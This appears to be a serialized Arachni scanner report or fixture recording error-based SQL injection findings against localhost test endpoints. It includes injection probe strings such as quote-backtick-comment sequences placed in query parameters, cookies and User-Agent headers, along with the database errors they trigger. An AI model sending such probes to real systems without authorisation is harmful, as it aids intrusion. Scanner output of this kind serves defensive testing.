!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/coldfusion/link/append?input=default
:verification:
:id: ! '[SQLServer JDBC Driver]'
var: input
url: http://localhost:7362/coldfusion/link/append?input=default
injected: default'`--
id: ! '[SQLServer JDBC Driver]'
regexp: (?i-mx:\[SQLServer JDBC Driver\])
regexp_match: ! '[SQLServer JDBC Driver]'
elem: link
remarks: {}
method: GET
response: ! '[Macromedia][SQLServer JDBC Driver]
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/coldfusion/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[SQLServer JDBC Driver\])
:match: ! '[SQLServer JDBC Driver]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value)
:injected: cookie value)
:combo:
!binary "Y29va2llMg==": cookie value)
:action: http://localhost:7362/coldfusion/cookie/append
:verification:
:id: ! '[SQLServer JDBC Driver]'
var: cookie2
url: http://localhost:7362/coldfusion/cookie/append
injected: cookie value)
id: ! '[SQLServer JDBC Driver]'
regexp: (?i-mx:\[SQLServer JDBC Driver\])
regexp_match: ! '[SQLServer JDBC Driver]'
elem: cookie
remarks: {}
method: GET
response: ! '[Macromedia][SQLServer JDBC Driver]
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value)
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/coldfusion/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[SQLServer JDBC Driver\])
:match: ! '[SQLServer JDBC Driver]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/coldfusion/cookie/flip
:verification:
:id: ! '[SQLServer JDBC Driver]'
var: Parameter flip
url: http://localhost:7362/coldfusion/cookie/flip
injected: ''
id: ! '[SQLServer JDBC Driver]'
regexp: (?i-mx:\[SQLServer JDBC Driver\])
regexp_match: ! '[SQLServer JDBC Driver]'
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "[Macromedia][SQLServer JDBC Driver]\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoyMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/coldfusion/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[SQLServer JDBC Driver\])
:match: ! '[SQLServer JDBC Driver]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/coldfusion/header/append
:verification:
:id: ! '[SQLServer JDBC Driver]'
var: User-Agent
url: http://localhost:7362/coldfusion/header/append
injected: arachni_user'`--
id: ! '[SQLServer JDBC Driver]'
regexp: (?i-mx:\[SQLServer JDBC Driver\])
regexp_match: ! '[SQLServer JDBC Driver]'
elem: header
remarks: {}
method: GET
response: ! '[Macromedia][SQLServer JDBC Driver]
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoyOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/coldfusion/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[SQLServer JDBC Driver\])
:match: ! '[SQLServer JDBC Driver]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/coldfusion/header/flip
:verification:
:id: ! '[SQLServer JDBC Driver]'
var: Parameter flip
url: http://localhost:7362/coldfusion/header/flip
injected: ''
id: ! '[SQLServer JDBC Driver]'
regexp: (?i-mx:\[SQLServer JDBC Driver\])
regexp_match: ! '[SQLServer JDBC Driver]'
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "[Macromedia][SQLServer JDBC Driver]\n", nil, nil, nil, nil,
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTkx
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/interbase/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Unexpected end of command in statement)
:match: Unexpected end of command in statement
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/interbase/form/flip
:verification:
:id: Unexpected end of command in statement
var: Parameter flip
url: http://localhost:7362/interbase/form/flip
injected: ''
id: Unexpected end of command in statement
regexp: (?i-mx:Unexpected end of command in statement)
regexp_match: Unexpected end of command in statement
elem: form
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! '["Warning: ibase_\nUnexpected end of command in statement\n",
nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/interbase/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Unexpected end of command in statement)
:match: Unexpected end of command in statement
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default)
:follow_location: true
:injected: default)
:combo:
!binary "aW5wdXQ=": default)
:action: http://localhost:7362/interbase/form/append
:verification:
:id: Unexpected end of command in statement
var: input
url: http://localhost:7362/interbase/form/append
injected: default)
id: Unexpected end of command in statement
regexp: (?i-mx:Unexpected end of command in statement)
regexp_match: Unexpected end of command in statement
elem: form
remarks: {}
method: GET
response: ! 'Warning: ibase_
Unexpected end of command in statement
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/interbase/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Unexpected end of command in statement)
:match: Unexpected end of command in statement
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/interbase/link/flip?input=default
:verification:
:id: Unexpected end of command in statement
var: Parameter flip
url: http://localhost:7362/interbase/link/flip?input=default
injected: ''
id: Unexpected end of command in statement
regexp: (?i-mx:Unexpected end of command in statement)
regexp_match: Unexpected end of command in statement
elem: link
remarks: {}
method: GET
response: ! '["Warning: ibase_\nUnexpected end of command in statement\n",
nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/interbase/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Unexpected end of command in statement)
:match: Unexpected end of command in statement
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
